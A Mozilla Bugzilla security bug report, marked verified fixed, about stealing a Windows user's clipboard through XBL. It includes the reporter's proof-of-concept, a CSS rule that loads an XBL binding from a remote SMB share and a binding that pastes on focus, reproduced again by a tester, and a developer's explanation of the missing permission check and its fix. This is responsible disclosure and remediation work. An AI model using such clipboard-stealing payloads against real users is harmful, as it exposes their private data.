45989 - stealing user's clipboard on Windows platform

Status: VERIFIED FIXED

(Core :: Security, defect, P1)

Description

[Mitchell Stoltz (not reading bugmail)]

I can't make heads or tails of this exploit. Could you take a look? -mls


From: 
          Georgi Guninski <joro@nat.bg>
      To: 
          Mitchell Stoltz <mstoltz@netscape.com>
It is possible to steal user's clipboard on Windows platform using XBL.
As far as I could test XBL bindings may be loaded only from chrome: and
file: protocols.
But on Windows the file: protocol allows accessing files residing on
remote host using Microsoft Networking.
The idea is to modify an event handler on an INPUT element so arbitrary
event (in the demo focus() ) to issue a paste command in an INPUT field.
Check attached files for demonstration.
Note: you must edit the path to clip1.xml in clip3.css so it can be
loaded.


Reading clipboard 
You must have some text in the clipboard. 

                                                                                   







input.class1 {
behavior:  url("file://///YOUR_MSN_SERVER/share/clip1.xml#inputFields");
}




<?xml version="1.0"?>
  
 <bindings id="htmlBindings"
   xmlns="http://www.mozilla.org/xbl"
 xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  
   <binding id="inputFields"
 extends="resource:/chrome/packages/widget-toolkit/global/content/
platformHTMLBindings.xml#inputFields">
     <handlers>
     <handler type="focus" command="cmd_paste" />
     </handlers>
   </binding>
 </bindings>

Comment 1

[Mitchell Stoltz (not reading bugmail)]

Heikki, this looks like it iunvolves event handling, and I heard you were taking 
that over. Please reassign if I am mistaken.

Comment 2

[Heikki Toivonen (remove -bugzilla when emailing directly)]

Was finally able to see this bug (wrong permissions)...

Hmm.. I'll think about this, although this might also be the responsibility of 
the XBL team.

Comment 3

[Heikki Toivonen (remove -bugzilla when emailing directly)]

I think this belongs to the XBL land.

Comment 4

[David Hyatt]

Holy cow, that's cool!

The basic problem is with the command="" shorthand syntax in XBL.  If you'd been 
forced to use explicit script, then you would have been denied access to the 
controller object, and you wouldn't have been allowed to tell it to do the 
paste.  

However with my shorthand syntax, I go ahead and perform the command in C++, so 
no permissions are checked.

This is cool!  The fix is to only allow command="..." on chrome URIs.  Trivial 
to patch. 

Nominating for nsbeta3.

Comment 5

[David Hyatt]

To clarify, the BOUND document needs to be a chrome URI, not the XBL doc.  I 
could be slicker about this and try to gauge the permissions of the bound doc, 
but for 6.0, it's easier to just turn this feature off for all but chrome docs.

Comment 6

[Peter Trudelle]

nsbeta3+/P2

Comment 7

[Phil Peterson]

PDT thinks this is a P1

Comment 8

[David Hyatt]

fixed.

Comment 9

[Jan Carpenter]

Mitchell, can you verify this?

Comment 10

[Mitchell Stoltz (not reading bugmail)]

How do I reproduce this? Is Georgi's example one file or two, and how do I run
the exploit?

Comment 11

[John Unruh]

Adding verifyme keyword

Comment 12

[ckritzer (gone)]

Okay,

So here's what I gathered from this bug:
1) input.class1 {
behavior:  url("file://///YOUR_MSN_SERVER/share/clip1.xml#inputFields");
}

is what you need to have copied to the clipboard when you load the xml file:

<?xml version="1.0"?>
<bindings id="htmlBindings"
   xmlns="http://www.mozilla.org/xbl"
 xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<binding id="inputFields"
 extends="resource:/chrome/packages/widget-toolkit/global/content/
platformHTMLBindings.xml#inputFields">
<handlers>
<handler type="focus" command="cmd_paste" />
</handlers>
</binding>
</bindings>

which will named and placed in the path described in the text which should be
copied to the clipboard.

Okay, and after all that, the bug is 

Verified FIXED on:
Win98SE 2001-02-13-06-Mtrunk